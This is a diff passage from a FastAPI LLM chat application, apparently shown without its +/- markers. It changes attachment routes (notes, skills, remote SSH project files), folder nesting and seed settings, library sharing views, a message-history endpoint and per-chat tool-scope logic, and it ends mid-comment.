def get_current_user(conn: HTTPConnection, db: Db) -> User | None:
def get_current_user(request: Request, db: Db) -> User | None:
"""Resolve the session cookie to a user, or None when signed out.
Cached on the connection's state so several dependencies in one request do
not each hit the sessions table.
`HTTPConnection` rather than `Request` because the terminal panel is a
WebSocket, and FastAPI injects a `WebSocket` there -- annotating this
`Request` fails at *connect* time rather than at import, so it would pass
every smoke test and break in a browser. `HTTPConnection` is the base of
both and carries the cookies and the state either way.
Cached on request.state so several dependencies in one request do not each
hit the sessions table.
"""
cached = getattr(conn.state, "user", None)
cached = getattr(request.state, "user", None)
if cached is not None:
return cached
user = resolve_session(db, conn.cookies.get(COOKIE_NAME))
conn.state.user = user
user = resolve_session(db, request.cookies.get(COOKIE_NAME))
request.state.user = user
return user
+1 -328
View File
@@ -16,17 +16,13 @@ from fastapi import (
status,
)
from fastapi.responses import FileResponse
from sqlalchemy import select
from lembas.api.deps import Db, RequiredUser, require_permission
from lembas.db.models import Attachment, Chat, Document, KnowledgeBase, Note
from lembas.security import permissions
from lembas.db.models import Attachment, Document
from lembas.services import files as files_service
from lembas.services import settings_store
from lembas.services.fetch import FetchError, fetch
from lembas.services.library import documents as documents_service
from lembas.services.library import notes as notes_service
from lembas.services.library import skills as skills_service
from lembas.web.templating import templates
log = logging.getLogger(__name__)
@@ -147,137 +143,6 @@ async def attach_from_knowledge(
)
def _chip(request: Request, attachment: Attachment) -> Response:
return templates.TemplateResponse(
request, "chat/_attachment_chip.html", {"request": request, "attachment": attachment}
)
def _not_available(request: Request, what: str) -> Response:
return templates.TemplateResponse(
request,
"chat/_attachment_error.html",
{"request": request, "filename": what, "error": f"That {what} is not available."},
)
@router.post("/from-note", dependencies=[Depends(require_permission("files.upload"))])
async def attach_from_note(
request: Request, db: Db, user: RequiredUser, note_id: str = Form(""), chat_id: str = Form("")
) -> Response:
"""Attach a note the model wrote earlier.
A copy, like every other attach path: a note is edited far more often than a
document, and a transcript that changes underneath itself because somebody
tidied a note later is the thing all of this is arranged to prevent.
"""
note = notes_service.get(db, note_id, user)
if note is None:
return _not_available(request, "note")
return _chip(
request,
files_service.store_text(
db,
user_id=user.id,
chat_id=chat_id or None,
filename=f"{note.title or 'note'}.txt",
text=note.body,
source_path=note.title or "",
source_label="Note",
),
)
@router.post("/from-scratch", dependencies=[Depends(require_permission("files.upload"))])
async def attach_from_scratch(
request: Request, db: Db, user: RequiredUser, chat_id: str = Form("")
) -> Response:
"""Attach this chat's scratch document.
A copy, like every other attach path, and here the reason is at its
sharpest: the pad goes on being written after the message is sent, by the
person and by the model, and a transcript that changed underneath itself
every time either of them typed would be no record at all.
"""
from lembas.services import scratch as scratch_service
chat = db.get(Chat, chat_id) if chat_id else None
if chat is None or chat.user_id != user.id:
return _not_available(request, "scratch document")
doc = scratch_service.get(db, chat)
if doc is None or not (doc.body or "").strip():
return _not_available(request, "scratch document")
return _chip(
request,
files_service.store_text(
db,
user_id=user.id,
chat_id=chat.id,
filename=f"{doc.title or 'scratch'}.md",
text=doc.body,
source_path=doc.title or "Scratch",
source_label="Scratch",
),
)
@router.post("/from-skill", dependencies=[Depends(require_permission("files.upload"))])
async def attach_from_skill(
request: Request, db: Db, user: RequiredUser, skill_id: str = Form(""), chat_id: str = Form("")
) -> Response:
"""Hand a skill over directly, rather than hoping the model fetches it.
The index of enabled skills is already in the harness and `skill_get` pulls
a body on demand -- but only if the model decides to. `@` is the reader
saying "use this one", which is a different act and deserves a way to say it.
"""
skill = skills_service.get(db, skill_id, user)
if skill is None:
return _not_available(request, "skill")
return _chip(
request,
files_service.store_text(
db,
user_id=user.id,
chat_id=chat_id or None,
filename=f"{skill.name}.md",
text=skill.body,
source_path=skill.name,
source_label="Skill",
),
)
@router.post("/from-attachment", dependencies=[Depends(require_permission("files.upload"))])
async def attach_from_attachment(
request: Request,
db: Db,
user: RequiredUser,
attachment_id: str = Form(""),
chat_id: str = Form(""),
) -> Response:
"""Point at something already in this conversation, without uploading again.
Copied rather than referenced, like everything else here -- an attachment
belongs to the message it was sent with, and two messages sharing one row
would make deleting either of them a question rather than an answer.
"""
original = db.get(Attachment, attachment_id)
if original is None or original.user_id != user.id:
return _not_available(request, "attachment")
return _chip(
request,
files_service.copy_attachment(
db, user_id=user.id, chat_id=chat_id or None, attachment=original
),
)
@router.get("/knowledge-picker", dependencies=[Depends(require_permission("files.upload"))])
async def knowledge_picker(
request: Request, db: Db, user: RequiredUser, q: str = "", chat_id: str = ""
@@ -302,198 +167,6 @@ async def knowledge_picker(
)
@router.get("/mention-picker", dependencies=[Depends(require_permission("files.upload"))])
async def mention_picker(
request: Request,
db: Db,
user: RequiredUser,
q: str = "",
chat_id: str = "",
profile_id: str = "",
project_dir: str = "",
) -> Response:
"""What `@` offers: files under the project directory, and the library.
One menu from two sources, because a person typing `@readme` is not
thinking about which store the answer lives in. The project half is only
there for an agent chat and only when a listing has already been built --
this is a keystroke-latency path and it must never wait on a machine.
Filtered server-side, like the knowledge picker beside it and for the same
reason: the library is searched with FTS rather than filtered in the
browser, which is what makes it work at five hundred documents. The project
half is filtered here too, so the client stays one `fetch` and a list.
"""
needle = q.strip().lower()
files: list[dict] = []
if profile_id and permissions.has(db, user, "tools.agent"):
from lembas.db.models import SshProfile
from lembas.services.agent import index as index_service
profile = db.get(SshProfile, profile_id)
# Re-checked rather than trusted from the query string: an id in a URL
# is not an authorisation, and this lists somebody's machine.
if profile is not None and profile.owner_id == user.id:
found = index_service.cached(profile_id, project_dir or profile.default_dir)
if found is not None:
files = [
{"path": path, "name": path.rstrip("/").rsplit("/", 1)[-1]}
for path in found.paths
if not needle or needle in path.lower()
][:20]
documents: list = []
notes: list = []
skills: list = []
bases: list = []
if permissions.has(db, user, "library.use"):
if needle:
documents = documents_service.search(db, user, q, limit=10)
notes = notes_service.search(db, user, q, limit=5)
skills = skills_service.search(db, user, q, limit=5)
else:
documents = list(
db.scalars(
documents_service.visible(db, user)
.order_by(Document.created_at.desc())
.limit(10)
)
)
notes = list(
db.scalars(
notes_service.visible(db, user).order_by(Note.updated_at.desc()).limit(5)
)
)
skills = list(db.scalars(skills_service.visible(db, user).limit(5)))
# A whole base is a *reference*, not a copy: attaching one scopes the
# chat to it and the model searches inside it. Dumping the contents of
# a folder of contracts into the window would be the wrong shape
# entirely, and `Chat.knowledge_bases` already means exactly this.
# Only in an existing chat, because there is nothing to attach it to
# before one exists -- the same reason project files are absent there.
if chat_id:
bases = [
base
for base in db.scalars(
documents_service.visible_bases(db, user).order_by(KnowledgeBase.name)
)
if not needle or needle in base.name.lower()
][:5]
# A URL typed after `@` is a page to read, not a name to look up. The
# fetcher, its SSRF guard and its HTML-to-text already live behind
# `/api/files/link`; this only offers it.
website = q.strip() if q.strip().lower().startswith(("http://", "https://")) else ""
attachments: list = []
if chat_id and needle:
attachments = list(
db.scalars(
select(Attachment)
.where(
Attachment.user_id == user.id,
Attachment.chat_id == chat_id,
Attachment.message_id.is_not(None),
)
.order_by(Attachment.created_at.desc())
.limit(20)
)
)
attachments = [a for a in attachments if needle in a.filename.lower()][:5]
return templates.TemplateResponse(
request,
"chat/_mention_picker.html",
{
"request": request,
"user": user,
"files": files,
"documents": documents,
"notes": notes,
"skills": skills,
"bases": bases,
"attachments": attachments,
"website": website,
"q": q,
"chat_id": chat_id,
"profile_id": profile_id,
},
)
@router.post("/from-project", dependencies=[Depends(require_permission("files.upload"))])
async def attach_from_project(
request: Request,
db: Db,
user: RequiredUser,
profile_id: str = Form(""),
path: str = Form(""),
chat_id: str = Form(""),
) -> Response:
"""Pull one file off the far machine and attach it to this message.
Its contents, not a reference: a model that has to spend a round calling
`file_read` often does not bother, and on a plain chat there is no
`file_read` to call. The path and the machine travel with it, so the model
is told exactly which file it is looking at rather than a bare basename it
cannot act on.
A directory attaches its listing instead of refusing -- "@ that folder" is
a reasonable thing to mean, and the listing is what it means.
"""
from lembas.db.models import SshProfile
from lembas.services.agent import ssh as ssh_service
from lembas.services.agent.base import ExecError
def _failed(message: str) -> Response:
return templates.TemplateResponse(
request,
"chat/_attachment_error.html",
{"request": request, "filename": path or "file", "error": message},
)
if not permissions.has(db, user, "tools.agent"):
return _failed("You do not have access to connections.")
profile = db.get(SshProfile, profile_id)
if profile is None or profile.owner_id != user.id or not profile.enabled:
return _failed("That connection is not available.")
if hint := ssh_service.available():
return _failed(hint)
wanted = path.strip()
if not wanted:
return _failed("No file was named.")
executor = ssh_service.SshExecutor(ssh_service.spec_from(profile), profile.default_dir)
try:
if wanted.endswith("/"):
names = await executor.list_dir(wanted.rstrip("/"))
body = "\n".join(names)
truncated = len(names) >= ssh_service.MAX_ENTRIES
else:
body = await executor.read_file(wanted, max_bytes=ssh_service.MAX_READ_BYTES)
truncated = len(body.encode("utf-8", "ignore")) >= ssh_service.MAX_READ_BYTES
except ExecError as exc:
return _failed(exc.message)
attachment = files_service.store_text(
db,
user_id=user.id,
chat_id=chat_id or None,
filename=wanted.rstrip("/").rsplit("/", 1)[-1] or wanted,
text=body,
truncated=truncated,
source_path=wanted,
source_label=profile.name,
)
return templates.TemplateResponse(
request, "chat/_attachment_chip.html", {"request": request, "attachment": attachment}
)
@router.delete("/{attachment_id}")
async def remove(db: Db, user: RequiredUser, attachment_id: str) -> Response:
"""Detach a file before it has been sent."""
+12 -138
View File
@@ -2,13 +2,11 @@
from __future__ import annotations
from fastapi import APIRouter, Depends, Form, HTTPException, Request, Response, status
from sqlalchemy import select
from fastapi import APIRouter, Depends, Form, HTTPException, Response, status
from sqlalchemy.orm import Session as DBSession
from lembas.api.deps import Db, RequiredUser, require_permission
from lembas.db.models import KINDS, Folder
from lembas.services.agent import policy as agent_policy
from lembas.db.models import Folder
# Every route here manages folders, so the guard belongs on the router.
router = APIRouter(
@@ -37,62 +35,6 @@ def _depth_of(db: DBSession, folder: Folder | None) -> int:
return depth
def _descendants(db: DBSession, folder: Folder) -> set[str]:
"""Every folder under this one, and this one. Bounded by MAX_DEPTH."""
found = {folder.id}
frontier = [folder.id]
for _ in range(MAX_DEPTH + 1):
if not frontier:
break
children = list(
db.scalars(select(Folder).where(Folder.parent_id.in_(frontier)))
)
frontier = [c.id for c in children if c.id not in found]
found.update(frontier)
return found
def _subtree_height(db: DBSession, folder: Folder) -> int:
"""How many levels this folder's own subtree occupies, itself included.
A move has to consider it: the constraint is on the *deepest leaf* after the
move, not on the folder being dragged.
"""
height = 1
frontier = [folder.id]
for _ in range(MAX_DEPTH + 1):
children = list(
db.scalars(select(Folder.id).where(Folder.parent_id.in_(frontier)))
)
if not children:
break
height += 1
frontier = children
return height
def candidate_parents(db: DBSession, user_id: str, folder: Folder) -> list[Folder]:
"""Folders this one could be moved into.
Everything the person owns, minus the folder itself and its own subtree --
which is the cycle guard in `update_folder` stated as a list rather than as
a refusal. A picker that offers a move the route will reject is a control
that looks like it works.
Depth is checked at the route rather than filtered here: it depends on how
tall *this* folder's subtree is, and a select that silently omitted a folder
for that reason would be unexplainable from the screen.
"""
blocked = _descendants(db, folder)
return [
candidate
for candidate in db.scalars(
select(Folder).where(Folder.user_id == user_id).order_by(Folder.name)
)
if candidate.id not in blocked
]
def _refresh_sidebar() -> Response:
"""Tell the browser to reload so the tree re-renders.
@@ -105,26 +47,13 @@ def _refresh_sidebar() -> Response:
return response
def _prompted(request: Request) -> str:
"""What somebody typed into an `hx-prompt` dialog, if anything.
htmx sends it as a header rather than a field, because the element carrying
the attribute may not be a form control at all. `ui.js` swaps the browser's
own prompt for the themed one and hands the answer back through the same
header, so this reads identically either way.
"""
return (request.headers.get("HX-Prompt") or "").strip()
@router.post("")
async def create_folder(
request: Request,
db: Db,
user: RequiredUser,
name: str = Form(""),
name: str = Form("New folder"),
parent_id: str = Form(""),
) -> Response:
name = name.strip() or _prompted(request)
parent = _owned_folder(db, parent_id, user.id) if parent_id else None
# A cap on nesting, so a runaway client cannot build a tree deep enough to
@@ -138,7 +67,7 @@ async def create_folder(
db.add(
Folder(
user_id=user.id,
name=name[:200] or "New folder",
name=name.strip()[:200] or "New folder",
parent_id=parent.id if parent else None,
)
)
@@ -146,47 +75,21 @@ async def create_folder(
return _refresh_sidebar()
# The settings a folder hands to chats started inside it, and how far each may
# run. A table rather than a run of `if` blocks so the save handler and the form
# cannot come to disagree about which fields exist -- the same reasoning the
# tool label table carries.
_SEEDS = {
"description": 500,
"system_prompt": 20_000,
"model_id": 300,
"ssh_profile_id": 32,
"project_dir": 1000,
}
@router.patch("/{folder_id}")
async def update_folder(
request: Request,
db: Db,
user: RequiredUser,
folder_id: str,
name: str | None = Form(None),
parent_id: str | None = Form(None),
collapsed: bool | None = Form(None),
) -> Response:
"""Rename, move, collapse, or set what this folder hands to its chats.
Reads the raw form rather than declaring `Form(None)` parameters, because
FastAPI cannot tell an empty field from an absent one -- a submitted `x=`
arrives as None, so "clear this prompt" and "leave it alone" would be the
same request. Key presence is the distinction, which is the rule
`api/chats.py:update_chat` already follows and the reason every field here
is clearable.
"""
folder = _owned_folder(db, folder_id, user.id)
form = await request.form()
# A rename can arrive from a settings form or from an `hx-prompt` button on
# the folder row; one route serves both. A blank name is ignored rather than
# stored, since a folder nobody can see the name of is one nobody can find.
name = str(form.get("name") or "").strip() or _prompted(request)
if name:
folder.name = name[:200]
if name is not None and name.strip():
folder.name = name.strip()[:200]
if "parent_id" in form:
parent_id = str(form["parent_id"]).strip()
if parent_id is not None:
new_parent = _owned_folder(db, parent_id, user.id) if parent_id else None
# Reparenting a folder into its own subtree would detach that subtree
# from the root and make it unreachable.
@@ -198,41 +101,12 @@ async def update_folder(
"A folder cannot be moved inside itself.",
)
cursor = db.get(Folder, cursor.parent_id) if cursor.parent_id else None
# And the depth cap, which `create_folder` has always applied and this
# path never did -- moving a three-deep subtree under a six-deep folder
# builds a tree nine deep, which is what MAX_DEPTH exists to keep out of
# the recursive sidebar template. It went unnoticed because nothing in
# the interface could submit `parent_id` at all until now.
subtree = _subtree_height(db, folder)
if new_parent is not None and _depth_of(db, new_parent) + subtree > MAX_DEPTH:
raise HTTPException(
status.HTTP_400_BAD_REQUEST,
f"Folders cannot be nested more than {MAX_DEPTH} deep.",
)
folder.parent_id = new_parent.id if new_parent else None
if "collapsed" in form:
folder.collapsed = str(form["collapsed"]).lower() in ("1", "true", "on", "yes")
for field, limit in _SEEDS.items():
if field in form:
setattr(folder, field, str(form[field]).strip()[:limit])
# Both are vocabularies rather than free text, and both accept "" for "no
# opinion". Anything else is dropped rather than stored: a folder seeding a
# kind that is not a kind would hand every chat started in it a value that
# `_new_chat` then has to ignore anyway.
if "kind" in form:
wanted = str(form["kind"]).strip()
folder.kind = wanted if wanted in KINDS else ""
if "agent_mode" in form:
wanted = str(form["agent_mode"]).strip()
folder.agent_mode = wanted if wanted in agent_policy.MODES else ""
if collapsed is not None:
folder.collapsed = collapsed
db.commit()
# One rule for every caller: reload. A rename or a move changes the tree,
# and a save from the settings page comes back showing what was stored --
# which is what somebody who pressed Save wants to see anyway.
return _refresh_sidebar()
+41 -87
View File
@@ -23,7 +23,10 @@ from lembas.api.deps import Db, RequiredUser, require_permission
from lembas.api.pages import sidebar_context
from lembas.db.models import (
AUTHOR_USER,
PRINCIPAL_GROUP,
PRINCIPAL_USER,
Document,
Group,
KnowledgeBase,
Note,
Skill,
@@ -37,7 +40,6 @@ from lembas.services.fetch import FetchError, fetch
from lembas.services.library import documents as documents_service
from lembas.services.library import memories as memories_service
from lembas.services.library import notes as notes_service
from lembas.services.library import retrieval
from lembas.services.library import skills as skills_service
from lembas.services.markdown import render_markdown
from lembas.web.templating import render
@@ -58,21 +60,32 @@ def _page(db: DBSession, query, page: int):
return rows, {"page": page, "pages": pages, "total": total}
def _shared_context(db: DBSession, user: User, resource, kind: str) -> dict:
"""What the share placeholder needs, which is now three facts.
The panel itself is fetched from `api/sharing.py`, so the names, the search
and the grants are no longer built here -- and neither is a query for every
account on the instance on every detail page.
"""
def _shared_context(db: DBSession, user: User, resource) -> dict:
"""Everything the share panel on a detail page needs."""
grants = sharing.grants_for(db, resource)
return {
"can_share": permissions.has(db, user, "library.share"),
"groups": list(db.scalars(select(Group).order_by(Group.name))),
"people": list(
db.scalars(select(User).where(User.id != user.id).order_by(User.name))
),
"shared_users": [g.principal_id for g in grants if g.principal_type == PRINCIPAL_USER],
"shared_groups": [g.principal_id for g in grants if g.principal_type == PRINCIPAL_GROUP],
"is_owner": resource.owner_id == user.id,
"share_kind": kind,
"share_id": resource.id,
}
def _apply_shares(db: DBSession, user: User, resource, form) -> None:
if not permissions.has(db, user, "library.share") or resource.owner_id != user.id:
return
sharing.set_grants(
db,
resource,
user_ids=form.getlist("share_user"),
group_ids=form.getlist("share_group"),
)
# --- Shell -------------------------------------------------------------------
@router.get("/library")
async def library_home(user: RequiredUser):
@@ -84,21 +97,9 @@ async def library_home(user: RequiredUser):
# before /library/knowledge/{base_id}, or "document" is parsed as a base id.
# FastAPI matches in registration order and this has bitten before.
@router.get("/library/knowledge")
async def knowledge_list(
request: Request, db: Db, user: RequiredUser, error: str = "", shared: bool = False
):
"""The bases, not the documents. A library is a set of places first.
`shared=1` narrows to bases other people have given this reader — the same
filter the notes and skills lists carry, and the one that makes "what have
people shared with me?" a question with an answer.
"""
query = (
select(KnowledgeBase).where(sharing.only_shared(KnowledgeBase, user))
if shared
else documents_service.visible_bases(db, user)
)
bases = list(db.scalars(query.order_by(KnowledgeBase.name)))
async def knowledge_list(request: Request, db: Db, user: RequiredUser, error: str = ""):
"""The bases, not the documents. A library is a set of places first."""
bases = list(db.scalars(documents_service.visible_bases(db, user).order_by(KnowledgeBase.name)))
counts = {
base.id: db.scalar(
select(func.count()).select_from(Document).where(Document.base_id == base.id)
@@ -113,7 +114,6 @@ async def knowledge_list(
"section": "knowledge",
"bases": bases,
"counts": counts,
"shared": shared,
"error": error,
**sidebar_context(db, user),
},
@@ -175,12 +175,7 @@ async def base_detail(
raise HTTPException(status.HTTP_404_NOT_FOUND, "That knowledge base is not available.")
if q.strip():
# The reader's search box gets the same recall a model's does. `None`
# when nothing is configured, which is the keyword search unchanged.
vector = await retrieval.embed_query(db, q)
rows = documents_service.search(
db, user, q, limit=PAGE_SIZE, base_ids=[base.id], vector=vector
)
rows = documents_service.search(db, user, q, limit=PAGE_SIZE, base_ids=[base.id])
pager = {"page": 1, "pages": 1, "total": len(rows)}
else:
rows, pager = _page(
@@ -199,7 +194,7 @@ async def base_detail(
"documents": rows,
"q": q,
"pager": pager,
**_shared_context(db, user, base, "base"),
**_shared_context(db, user, base),
**sidebar_context(db, user),
},
)
@@ -219,6 +214,7 @@ async def update_base(request: Request, db: Db, user: RequiredUser, base_id: str
base.name = name
base.description = str(form.get("description", "")).strip()[:2000]
db.commit()
_apply_shares(db, user, base, form)
return RedirectResponse(
f"/library/knowledge/{base.id}", status_code=status.HTTP_303_SEE_OTHER
)
@@ -245,7 +241,7 @@ async def upload_document(
if base is not None and not sharing.can_write(base, user):
raise HTTPException(status.HTTP_403_FORBIDDEN, "That base is not yours to add to.")
payload = await file.read(files_service.limits().max_upload_bytes + 1)
payload = await file.read(files_service.MAX_UPLOAD_BYTES + 1)
try:
document = documents_service.store_upload(
db,
@@ -343,34 +339,14 @@ async def document_content(db: Db, user: RequiredUser, document_id: str) -> Resp
# --- Notes -------------------------------------------------------------------
@router.get("/library/notes")
async def notes_list(
request: Request,
db: Db,
user: RequiredUser,
q: str = "",
page: int = 1,
shared: bool = False,
):
"""`shared=1` narrows to what other people have given this reader.
A separate view rather than a badge in the mixed list. A badge answers "is
this mine?" for a row already on screen; the question somebody has is "what
have people given me?", which a mixed list of two hundred cannot answer.
Searching inside it is deliberately left out -- the search path returns
ranked ids and re-filtering them by owner would silently shorten the page.
"""
async def notes_list(request: Request, db: Db, user: RequiredUser, q: str = "", page: int = 1):
if q.strip():
rows = notes_service.search(
db, user, q, limit=PAGE_SIZE, vector=await retrieval.embed_query(db, q)
)
rows = notes_service.search(db, user, q, limit=PAGE_SIZE)
pager = {"page": 1, "pages": 1, "total": len(rows)}
else:
query = (
select(Note).where(sharing.only_shared(Note, user))
if shared
else notes_service.visible(db, user)
rows, pager = _page(
db, notes_service.visible(db, user).order_by(Note.updated_at.desc()), page
)
rows, pager = _page(db, query.order_by(Note.updated_at.desc()), page)
return render(
request,
"library/notes.html",
@@ -378,7 +354,6 @@ async def notes_list(
"section": "notes",
"notes": rows,
"q": q,
"shared": shared,
"pager": pager,
**sidebar_context(db, user),
},
@@ -406,7 +381,7 @@ async def note_detail(request: Request, db: Db, user: RequiredUser, note_id: str
"section": "notes",
"note": note,
"body_html": render_markdown(note.body),
**_shared_context(db, user, note, "note"),
**_shared_context(db, user, note),
**sidebar_context(db, user),
},
)
@@ -430,6 +405,7 @@ async def update_note(request: Request, db: Db, user: RequiredUser, note_id: str
form = await request.form()
notes_service.update(db, note, title=str(form.get("title", "")), body=str(form.get("body", "")))
_apply_shares(db, user, note, form)
return RedirectResponse(f"/library/notes/{note.id}", status_code=status.HTTP_303_SEE_OTHER)
@@ -444,34 +420,12 @@ async def delete_note(db: Db, user: RequiredUser, note_id: str) -> Response:
# --- Skills ------------------------------------------------------------------
@router.get("/library/skills")
async def skills_list(
request: Request,
db: Db,
user: RequiredUser,
q: str = "",
page: int = 1,
shared: bool = False,
):
"""`shared=1` narrows to what other people have given this reader.
A separate view rather than a badge in the mixed list. A badge answers "is
this mine?" for a row already on screen; the question somebody has is "what
have people given me?", which a mixed list of two hundred cannot answer.
Searching inside it is deliberately left out -- the search path returns
ranked ids and re-filtering them by owner would silently shorten the page.
"""
async def skills_list(request: Request, db: Db, user: RequiredUser, q: str = "", page: int = 1):
if q.strip():
rows = skills_service.search(
db, user, q, limit=PAGE_SIZE, vector=await retrieval.embed_query(db, q)
)
rows = skills_service.search(db, user, q, limit=PAGE_SIZE)
pager = {"page": 1, "pages": 1, "total": len(rows)}
else:
query = (
select(Skill).where(sharing.only_shared(Skill, user))
if shared
else skills_service.visible(db, user)
)
rows, pager = _page(db, query.order_by(Skill.name), page)
rows, pager = _page(db, skills_service.visible(db, user).order_by(Skill.name), page)
return render(
request,
"library/skills.html",
@@ -479,7 +433,6 @@ async def skills_list(
"section": "skills",
"skills": rows,
"q": q,
"shared": shared,
"pager": pager,
**sidebar_context(db, user),
},
@@ -507,7 +460,7 @@ async def skill_detail(request: Request, db: Db, user: RequiredUser, skill_id: s
"section": "skills",
"skill": skill,
"revisions": skill.revisions,
**_shared_context(db, user, skill, "skill"),
**_shared_context(db, user, skill),
**sidebar_context(db, user),
},
)
@@ -548,6 +501,7 @@ async def update_skill(request: Request, db: Db, user: RequiredUser, skill_id: s
author=AUTHOR_USER,
note="edited by hand",
)
_apply_shares(db, user, skill, form)
return RedirectResponse(f"/library/skills/{skill.id}", status_code=status.HTTP_303_SEE_OTHER)
-124
View File
@@ -1,124 +0,0 @@
"""Messages: one conversation per person, read backwards on demand.
The page is the ordinary chat shell with two differences: it opens on the most
recent turns rather than on all of them, and above them sits a sentinel that
fetches the page before whenever it is scrolled into view.
That sentinel is the mirror of `GET /api/chats/{id}/tail`, which polls forwards,
and it keeps the same four properties for the same reasons — most of all
answering **204 to a cursor it cannot place** rather than falling back to "the
oldest hundred", which would prepend a block the page already holds.
"""
from __future__ import annotations
import logging
from fastapi import APIRouter, Request, Response, status
from lembas.api.deps import Db, RequiredUser
from lembas.api.pages import _chat_context, sidebar_context
from lembas.db.models import Message, Schedule
from lembas.services import messages as messages_service
from lembas.services import schedules as schedules_service
from lembas.services.markdown import render_markdown
from lembas.services.schedule import clock
from lembas.services.schedule import rule as rule_service
from lembas.web.templating import render
log = logging.getLogger(__name__)
router = APIRouter(tags=["messages"])
def _bodies(messages: list[Message]) -> dict[str, str]:
"""Markdown rendered server-side, keyed by id, as `chat_detail` does."""
return {m.id: render_markdown(m.content) for m in messages if m.role == "user"}
@router.get("/messages")
async def messages_page(request: Request, db: Db, user: RequiredUser):
conversation = messages_service.for_user(db, user)
live = messages_service.live_messages(db, conversation)
# The schedules that post in here, listed beside the conversation because
# this is where somebody would look for them -- a schedule whose output
# arrives in this thread and whose controls are two pages away is one nobody
# will find when they want to stop it.
posting = list(
db.scalars(
schedules_service.visible(user)
.where(Schedule.target == "messages")
.order_by(Schedule.created_at.desc())
)
)
zone = clock.zone_for(user)
return render(
request,
"messages/index.html",
{
"chat": conversation,
"messages": live,
"compacted": [],
"bodies": _bodies(live),
"inherited_prompt": "",
"inherited_from": "",
"more_before": bool(live) and messages_service.has_more_before(
db, conversation, live[0]
),
"oldest_id": live[0].id if live else "",
"schedules": [
{
"row": row,
"summary": rule_service.describe(row.rule_json or {}, zone=zone),
}
for row in posting
],
**_chat_context(db, user, conversation),
**sidebar_context(db, user),
},
)
@router.get("/api/messages/history")
async def messages_history(
request: Request, db: Db, user: RequiredUser, before: str = ""
) -> Response:
"""The page of turns immediately before `before`, oldest first.
204 rather than a fallback whenever the cursor cannot be placed: an absent
one, one from another chat, one belonging to a message that has gone. The
alternative -- answering with the oldest page -- would prepend a block the
reader is already looking at, and a duplicated transcript is something only
a reload can reconcile.
"""
conversation = messages_service.for_user(db, user)
cursor = db.get(Message, before) if before else None
if cursor is None or cursor.chat_id != conversation.id:
return Response(status_code=status.HTTP_204_NO_CONTENT)
page = messages_service.older_than(db, conversation, cursor)
if not page:
return Response(status_code=status.HTTP_204_NO_CONTENT)
from lembas.web.templating import templates
return templates.TemplateResponse(
request,
"messages/_history.html",
{
"messages": page,
"bodies": _bodies(page),
"more_before": messages_service.has_more_before(db, conversation, page[0]),
"oldest_id": page[0].id,
# `render()` injects `user` and friends; `TemplateResponse` does
# not, and `chat/_message.html` dereferences both `user` and `chat`
# -- the same reason the SSE path passes them by hand. Missing
# either is a 500 on scroll and nothing at all on the page that
# rendered fine.
"user": user,
"chat": conversation,
**_chat_context(db, user, conversation),
},
)
+32 -516
View File
@@ -2,36 +2,21 @@
from __future__ import annotations
from zoneinfo import available_timezones
from fastapi import APIRouter, HTTPException, Request, Response, status
from fastapi.responses import FileResponse, JSONResponse, RedirectResponse
from sqlalchemy import select
from sqlalchemy.orm import Session as DBSession
from lembas.api.deps import Db, RequiredUser
from lembas.db.models import (
KIND_CHAT,
KIND_MESSAGES,
KIND_TASK,
KINDS,
Chat,
Folder,
KnowledgeBase,
Message,
User,
)
from lembas.db.models import Chat, Folder, KnowledgeBase, Message, User
from lembas.security import permissions
from lembas.services import audio as audio_service
from lembas.services import branding as branding_service
from lembas.services import canvas as canvas_service
from lembas.services import chat as chat_service
from lembas.services import compaction as compaction_service
from lembas.services import reports as reports_service
from lembas.services import settings_store
from lembas.services import suggestions as suggestions_service
from lembas.services.library import documents as documents_service
from lembas.services.schedule import clock
from lembas.services.markdown import render_markdown
from lembas.web.templating import STATIC_DIR, render
router = APIRouter(tags=["pages"])
@@ -52,6 +37,9 @@ def _chat_context(db: DBSession, user: User, chat: Chat | None) -> dict:
current = next((m for m in models if m.model_id == chat.model_id), None) if chat else None
return {
"models": models,
# For the sidebar shortcuts only. The picker lists `models` in the
# administrator's order, pinned or not.
"pinned_models": [m for m in models if m.pinned],
"current_model": current,
# Assistant bubbles show the avatar of the model that wrote them, which
# may not be the model the chat is set to now. Keyed by model_id, the
@@ -70,276 +58,10 @@ def _chat_context(db: DBSession, user: User, chat: Chat | None) -> dict:
else []
),
"attached_base_ids": [base.id for base in chat.knowledge_bases] if chat else [],
# The three a reasoning model understands. From the service so the
# command, the control and the request builder cannot disagree about
# what is a valid effort.
"efforts": chat_service.EFFORTS,
# What the picker shows, and what `build_request` will send. One
# resolver so the two cannot disagree.
"resolved_effort": chat_service.resolved_effort(chat) if chat else "",
**_scope_context(db, user, chat),
**_agent_context(db, user, chat),
**audio_service.template_flags(db, user),
}
def _scope_context(db: DBSession, user: User, chat: Chat | None) -> dict:
"""What this chat may use, for the menu that narrows it.
The families listed are the ones actually offered *right now*, so the menu
never shows a switch for something the model, the reader's permissions or
the instance has already ruled out -- turning that on would do nothing,
since `resolve_tools` applies this after the gates.
**It works before the chat exists**, and that is not a nicety. The whole
point of narrowing is to decide what a conversation may reach, and the first
turn is the one where it matters most: the harness puts a tool's guidance in
front of the model the moment the tool is offered, so by the time a chat
existed to switch anything off, the model had already been told how to keep
notes and been given the tools to do it. Switching it off afterwards does
not un-send that turn.
It used to say there was no row to write to. There is not -- so the
prospective menu writes nothing: its switches are plain checkboxes submitted
with the first message, and `start_chat` turns them into `scope_json` on the
row it is about to create. `scope_allow` stays empty because nothing can
have been allowed yet.
The stand-in `Chat` is `agent/draft.py:as_chat`'s trick again: `resolve_tools`
reads the kind, the model and the scope off a chat and never queries or
writes it, so a row that is constructed and never added satisfies it
unchanged. `scope_json` is set explicitly because it is a *column* default,
applied at flush, and this one is never flushed.
"""
from lembas.services import tool_labels
from lembas.services import tools as tools_service
from lembas.services.library import skills as skills_service
prospective = chat is None
if prospective:
model_id = ""
chosen = chat_service.default_model(db, user)
if chosen is not None:
model_id = chosen[0]
if not model_id:
return {"scope_families": [], "scope_skills": [], "scope_allow": []}
# An ordinary chat, deliberately, even though the kind can still be
# switched on this screen: an agent chat's tools depend on a connection
# that is not settled until the chat is created, so offering them here
# would be a switch for something that may not be offered. Everything a
# plain chat can reach is switchable, which is the part that matters.
chat = Chat(user_id=user.id, kind=KIND_CHAT, model_id=model_id, scope_json={})
off = tools_service.scoped_off(chat)
skills_off = tools_service.scoped_skills_off(chat)
# Gates rather than tool names: `notes` is one switch, not five, which is
# the same reasoning the per-model capability checkboxes carry.
seen: dict[str, str] = {}
for tool in tools_service.resolve_tools(db, chat, user).defs:
seen.setdefault(tools_service.gate_of(tool.family), tool.name)
# Anything already switched off is absent from the offered set, so it has to
